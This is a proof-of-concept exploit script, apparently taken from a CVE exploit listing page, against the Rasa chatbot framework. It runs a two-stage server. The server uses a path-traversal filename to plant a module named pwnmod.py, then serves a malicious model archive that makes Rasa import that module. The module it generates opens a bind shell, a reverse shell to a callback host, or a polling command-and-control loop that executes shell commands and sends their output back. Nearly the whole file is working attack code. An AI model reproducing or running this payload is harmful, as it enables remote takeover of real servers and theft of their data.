5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / server-2.py PY
import argparse
import base64
import datetime
import http.server
import socketserver
import urllib.parse
from pathlib import Path
from typing import Dict, List, Optional


BASE_DIR = Path(__file__).resolve().parent
DEFAULT_EVIL_MODEL = BASE_DIR / "evil_import_model.tar.gz"


def build_pwnmod(
    mode: str,
    bind_port: int,
    reverse_host: Optional[str],
    reverse_port: Optional[int],
    c2_base_url: Optional[str],
) -> bytes:
    """Build pwnmod.py payload for the Rasa graph import chain.

    Returns bytes ready to be served as the write-module response body.
    """

    # Per-mode imports and bootstrap
    if mode == "bind":
        imports = """import os
import pty
import socket
import threading
import time"""
        bootstrap = f"""
def _launch():
    # Target listens on {bind_port}. Useful when the port is reachable.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("0.0.0.0", {bind_port}))
    s.listen(1)
    while True:
        conn, _ = s.accept()
        pid = os.fork()
        if pid == 0:
            try:
                s.close()
                os.dup2(conn.fileno(), 0)
                os.dup2(conn.fileno(), 1)
                os.dup2(conn.fileno(), 2)
                pty.spawn("/bin/sh")
            finally:
                os._exit(0)
        conn.close()
"""

    elif mode == "reverse":
        if not reverse_host or not reverse_port:
            raise SystemExit("reverse mode requires --reverse-host and --reverse-port")
        imports = """import os
import pty
import socket
import threading
import time"""
        bootstrap = f"""
def _launch():
    # Target connects back. Best for Docker/NAT environments.
    while True:
        s = None
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(("{reverse_host}", {reverse_port}))
            os.dup2(s.fileno(), 0)
            os.dup2(s.fileno(), 1)
            os.dup2(s.fileno(), 2)
            pty.spawn("/bin/sh")
        except Exception:
            pass
        finally:
            try:
                if s:
                    s.close()
            except Exception:
                pass
        time.sleep(5)
"""

    elif mode == "c2":
        if not c2_base_url:
            raise SystemExit("c2 mode requires --c2-base-url")
        imports = """import base64
import os
import pty
import socket
import subprocess
import threading
import time
import urllib.parse
import urllib.request"""
        bootstrap = f"""
def _launch():
    # HTTP polling C2. Reuses the same outbound HTTP path as model fetch.
    agent = socket.gethostname()
    while True:
        try:
            poll_url = "{c2_base_url}/poll?agent=" + urllib.parse.quote(agent)
            cmd = urllib.request.urlopen(poll_url, timeout=20).read().decode("utf-8", "ignore").strip()
            if cmd:
                proc = subprocess.Popen(
                    ["/bin/sh", "-c", cmd],
                    stdout=subprocess.PIPE,
                    stderr=subprocess.STDOUT,
                )
                out, _ = proc.communicate(timeout=60)
                data = urllib.parse.urlencode({{
                    "agent": agent,
                    "cmd": cmd,
                    "output_b64": base64.b64encode(out).decode(),
                }}).encode()
                urllib.request.urlopen(
                    urllib.request.Request(
                        "{c2_base_url}/result",
                        data=data,
                        headers={{"Content-Type": "application/x-www-form-urlencoded"}},
                        method="POST",
                    ),
                    timeout=20,
                ).read()
        except Exception:
            pass
        time.sleep(3)
"""

    else:
        raise SystemExit(f"unknown mode: {mode}")

    payload = f"""{imports}


{bootstrap}


# Import side-effect: Rasa imports pwnmod before it uses Pwn.
threading.Thread(target=_launch, daemon=True).start()


class Pwn:
    @classmethod
    def load(cls, config=None, model_storage=None, resource=None, execution_context=None, **kwargs):
        return cls()

    @staticmethod
    def get_default_config():
        return {{}}

    def provide(self, **kwargs):
        return None
"""
    return payload.encode("utf-8")


class Handler(http.server.BaseHTTPRequestHandler):
    server_version = "RasaStage2/1.0"

    def do_GET(self) -> None:
        parsed = urllib.parse.urlparse(self.path)
        query = urllib.parse.parse_qs(parsed.query)

        if parsed.path.startswith("/write-module"):
            # Stage 1: path traversal via filename header writes /app/pwnmod.py
            self.server.hits.append(self._hit("write-module"))
            self._send_file(
                self.server.pwnmod,
                "text/plain; charset=utf-8",
                self.server.module_filename,
                "stage2-write-module",
            )
            return

        if parsed.path.startswith("/model"):
            # Stage 2: serve the evil model whose metadata.json imports pwnmod.Pwn
            self.server.hits.append(self._hit("model"))
            self._send_file(
                self.server.evil_model.read_bytes(),
                "application/x-tar",
                self.server.tar_filename,
                "stage2-evil-model",
            )
            return

        # ---- C2 management endpoints ----
        if parsed.path.startswith("/poll"):
            agent = query.get("agent", [None])[0]
            if agent is None:
                # Anonymous poll — never consume from wildcard queue.
                # Only real agents (that know their hostname) get commands.
                self.server.hits.append(self._hit("poll anonymous (no agent param)"))
                self._send_file(b"", "text/plain; charset=utf-8", "cmd.txt", "poll")
                return
            cmd = self.server.pending_cmds.pop(agent, self.server.pending_cmds.pop("*", ""))
            self.server.hits.append(self._hit(f"poll agent={agent} cmd={cmd!r}"))
            self._send_file(cmd.encode("utf-8"), "text/plain; charset=utf-8", "cmd.txt", "poll")
            return

        if parsed.path.startswith("/enqueue"):
            agent = query.get("agent", ["*"])[0]
            cmd = query.get("cmd", [""])[0]
            self.server.pending_cmds[agent] = cmd
            self.server.hits.append(self._hit(f"enqueue agent={agent} cmd={cmd!r}"))
            self._send_file(b"ok\n", "text/plain; charset=utf-8", "enqueue.txt", "enqueue")
            return

        if parsed.path.startswith("/last"):
            agent = query.get("agent", ["default"])[0]
            body = self.server.results.get(agent, "")
            self.server.hits.append(self._hit(f"last agent={agent}"))
            self._send_file(body.encode("utf-8"), "text/plain; charset=utf-8", "result.txt", "last")
            return

        if parsed.path.startswith("/agents"):
            body = "\n".join(sorted(self.server.results.keys())) + "\n"
            self.server.hits.append(self._hit("agents"))
            self._send_file(body.encode("utf-8"), "text/plain; charset=utf-8", "agents.txt", "agents")
            return

        if parsed.path.startswith("/hits"):
            body = "\n".join(self.server.hits).encode("utf-8") + b"\n"
            self._send_file(body, "text/plain; charset=utf-8", "hits.txt", "hits")
            return

        if parsed.path.startswith("/healthz"):
            self._send_file(b"ok\n", "text/plain; charset=utf-8", "healthz.txt", "healthz")
            return

        self.send_response(404)
        self.end_headers()
        self.wfile.write(b"not found\n")

    def do_POST(self) -> None:
        parsed = urllib.parse.urlparse(self.path)
        if not parsed.path.startswith("/result"):
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"not found\n")
            return

        # C2 agent posts command output here.
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        form = urllib.parse.parse_qs(body.decode("utf-8", "ignore"))
        agent = form.get("agent", ["default"])[0]
        cmd = form.get("cmd", [""])[0]
        output_b64 = form.get("output_b64", [""])[0]
        try:
            output = base64.b64decode(output_b64).decode("utf-8", "replace")
        except Exception:
            output = "<decode failed>"
        self.server.results[agent] = f"$ {cmd}\n{output}"
        self.server.hits.append(self._hit(f"result agent={agent} cmd={cmd!r}"))
        self._send_file(b"ok\n", "text/plain; charset=utf-8", "result_ack.txt", "result")

    def _hit(self, route: str) -> str:
        ts = datetime.datetime.now(datetime.timezone.utc).isoformat(timespec="seconds") + "Z"
        return f"{ts} {self.client_address[0]} {self.command} {self.path} {route}"

    def _send_file(self, body: bytes, content_type: str, filename: str, etag: str) -> None:
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.send_header("ETag", etag)
        self.send_header("filename", filename)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt: str, *args) -> None:
        print(f"{self.address_string()} - {fmt % args}", flush=True)


class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    allow_reuse_address = True

    # Instance attributes (set in main)
    pwnmod: bytes
    evil_model: Path
    module_filename: str
    tar_filename: str
    hits: List[str]
    pending_cmds: Dict[str, str]
    results: Dict[str, str]


def main() -> None:
    parser = argparse.ArgumentParser(
        description="Minimal Rasa stage2 model server — serves path-traversal write + evil model"
    )
    parser.add_argument("--listen", default="0.0.0.0", help="Bind address (default: 0.0.0.0)")
    parser.add_argument("--port", type=int, default=8000, help="Listen port (default: 8000)")
    parser.add_argument(
        "--mode", "--model",
        choices=["bind", "reverse", "c2"],
        default="reverse",
        help="Payload mode: bind shell, reverse shell, or HTTP C2 polling (default: reverse)",
    )
    parser.add_argument("--bind-port", type=int, default=4444, help="Port for bind shell (bind mode)")
    parser.add_argument("--reverse-host", help="Callback IP/hostname (reverse mode)")
    parser.add_argument("--reverse-port", type=int, help="Callback port (reverse mode)")
    parser.add_argument("--c2-base-url", help="C2 poll base URL (c2 mode)")
    parser.add_argument("--evil-model", type=Path, default=DEFAULT_EVIL_MODEL,
                        help="Path to evil model tar.gz")
    parser.add_argument("--module-filename", default="../../app/pwnmod.py",
                        help="Path-traversal filename for the write-module stage "
                             "(default: ../../app/pwnmod.py)")
    parser.add_argument("--tar-filename", default="evil_import_model.tar.gz",
                        help="Filename header value for the model stage "
                             "(default: evil_import_model.tar.gz)")
    args = parser.parse_args()

    if not args.evil_model.exists():
        raise SystemExit(f"missing evil model archive: {args.evil_model}")

    pwnmod = build_pwnmod(
        args.mode,
        args.bind_port,
        args.reverse_host,
        args.reverse_port,
        args.c2_base_url,
    )

    with ThreadingTCPServer((args.listen, args.port), Handler) as httpd:
        httpd.pwnmod = pwnmod
        httpd.evil_model = args.evil_model
        httpd.module_filename = args.module_filename
        httpd.tar_filename = args.tar_filename
        httpd.hits = []
        httpd.pending_cmds = {}
        httpd.results = {}

        base = f"http://{args.listen}:{args.port}"
        print(f"listening:  {base}", flush=True)
        print(f"mode:       {args.mode}", flush=True)
        print(f"stage-1:    {base}/write-module  ->  filename: {args.module_filename}", flush=True)
        print(f"stage-2:    {base}/model          ->  filename: {args.tar_filename}", flush=True)
        if args.mode == "bind":
            print(f"bind shell: 0.0.0.0:{args.bind_port}", flush=True)
        elif args.mode == "reverse":
            print(f"reverse:    {args.reverse_host}:{args.reverse_port}", flush=True)
        else:
            print(f"c2 poll:    {args.c2_base_url}/poll", flush=True)
            print(f"enqueue:    {base}/enqueue?cmd=id", flush=True)

        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print("\nshutting down", flush=True)


if __name__ == "__main__":
    main()